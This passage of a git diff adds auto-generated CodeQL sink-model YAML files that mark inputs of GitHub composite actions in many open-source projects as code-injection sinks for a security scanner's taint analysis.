b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml new file mode 100644 index 00000000000..ca6459221d4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elementor/elementor", "*", "inputs.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml new file mode 100644 index 00000000000..79d14b65bcc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["emberjs/data", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml new file mode 100644 index 00000000000..69771693787 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["emqx/emqx", "*", "inputs.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "inputs.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml new file mode 100644 index 00000000000..a5a3cfbb1c9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eonasdan/tempus-dominus", "*", "inputs.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "inputs.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml new file mode 100644 index 00000000000..2000f5d9d00 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["erlang/otp", "*", "inputs.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "inputs.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml new file mode 100644 index 00000000000..95164c659ed --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["esphome/esphome", "*", "inputs.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "inputs.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml new file mode 100644 index 00000000000..7e3b5e4caf6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expensify/app", "*", "inputs.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml new file mode 100644 index 00000000000..f335170dc85 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/expo", "*", "inputs.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml new file mode 100644 index 00000000000..555fa42a79c --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/vscode-expo", "*", "inputs.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "inputs.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml new file mode 100644 index 00000000000..8fd9440729f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["external-secrets/external-secrets", "*", "inputs.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "inputs.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml new file mode 100644 index 00000000000..f9479e11aab --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/buck2", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml new file mode 100644 index 00000000000..711eabc2bfa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/flow", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml new file mode 100644 index 00000000000..745f89d8677 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/yoga", "*", "inputs.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "inputs.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml new file mode 100644 index 00000000000..a732e2fac3f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebookresearch/xformers", "*", "inputs.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.cuda", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml new file mode 100644 index 00000000000..1aebd1199a5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fastly/compute-actions", "*", "inputs.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml new file mode 100644 index 00000000000..708adf528f2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["felangel/bloc", "*", "inputs.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml new file mode 100644 index 00000000000..18c02da4443 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebase/firebase-ios-sdk", "*", "inputs.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.notices-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml new file mode 100644 index 00000000000..c0a44fae749 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flaxengine/flaxengine", "*", "inputs.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml new file mode 100644 index 00000000000..af0f474bfae --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml new file mode 100644 index 00000000000..731ecd5ab1b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fluxcd/flux2", "*", "inputs.bindir", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "inputs.token", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml new file mode 100644 index 00000000000..ca4dc84bbfc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["forcedotcom/salesforcedx-vscode", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml new file mode 100644 index 00000000000..caa6432efa9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fossasia/visdom", "*", "inputs.loadprbuild", "code-injection", "generated"] + - ["fossasia/visdom", "*", "inputs.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml new file mode 100644 index 00000000000..a2e78841f69 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freckle/stack-action", "*", "inputs.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml new file mode 100644 index 00000000000..fbb76ae46e8 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freeradius/freeradius-server", "*", "inputs.gcc_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "inputs.llvm_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "inputs.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml new file mode 100644 index 00000000000..23d001db673 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gaphor/gaphor", "*", "inputs.version", "code-injection", "generated"] + - ["gaphor/gaphor", "*", "inputs.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml new file mode 100644 index 00000000000..94c7adf250a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/action-release", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml new file mode 100644 index 00000000000..85632a06a75 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["github/codeql-action", "*", "inputs.latest_tag", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.major_version", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.version", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.use-all-platform-bundle", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml new file mode 100644 index 00000000000..9f002168214 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["github/ruby", "*", "inputs.builddir", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.srcdir", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.test-opts", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.report-path", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml new file mode 100644 index 00000000000..f1191e5c1c6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gittools/gitversion", "*", "inputs.distro", "code-injection", "generated"] + - ["gittools/gitversion", "*", "inputs.targetFramework", "code-injection", "generated"] + - ["gittools/gitversion", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml new file mode 100644 index 00000000000..b0e30669c2e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-spatial/tegola", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["go-spatial/tegola", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml new file mode 100644 index 00000000000..e26f0a886d9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["goauthentik/authentik", "*", "inputs.postgresql_version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml new file mode 100644 index 00000000000..4b40b2fda8a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["godotengine/godot", "*", "inputs.bin", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.tests", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.target", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml new file mode 100644 index 00000000000..06b6e37ea1c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["google/dagger", "*", "inputs.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml new file mode 100644 index 00000000000..dab53d9d5a3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googleapis/java-cloud-bom", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml new file mode 100644 index 00000000000..ce485e688f2 
--- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googleapis/sdk-platform-java", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 00000000000..82d69349e3a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml new file mode 100644 index 00000000000..13a6bfe9233 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitational/teleport", "*", "inputs.target", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.attempts", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.flags", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.path", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.bin", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml new file mode 100644 index 00000000000..163abb26185 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["grote/transportr", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml new file mode 100644 index 00000000000..3be0de43329 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/nomad", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml new file mode 100644 index 00000000000..2b0b84e172b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform", "*", "inputs.target-terraform-branch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-terraform-version", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-arch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-os", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml new file mode 100644 index 00000000000..bcd6e0eda31 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"] + - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml new file mode 100644 index 00000000000..d93b946f3d7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["home-assistant/android", "*", "inputs.lokalise-token", "code-injection", "generated"] + - ["home-assistant/android", "*", "inputs.lokalise-project", "code-injection", "generated"] + - ["home-assistant/android", "*", "inputs.tag-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml new file mode 100644 index 00000000000..40adbe1fc29 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["homebrew/actions", "*", "inputs.casks", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.formulae", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.signing_key", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.workflow-name", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.collapse", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.step_name", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.result_path", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.workdir", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml new file mode 100644 index 00000000000..293d8a832bd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperledger/aries-cloudagent-python", "*", "inputs.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml new file mode 100644 index 00000000000..c72000641ce --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperledger/fabric-samples", "*", "inputs.ca-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "inputs.fabric-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "inputs.k9s-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml new file mode 100644 index 00000000000..53929ab8ed1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["igniterealtime/openfire", "*", "inputs.domain", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "inputs.ip", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "inputs.distBaseDir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml new file mode 100644 index 00000000000..1330f370747 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["infracost/actions", "*", "inputs.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml new file mode 100644 index 00000000000..d9d9c6770bc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml 
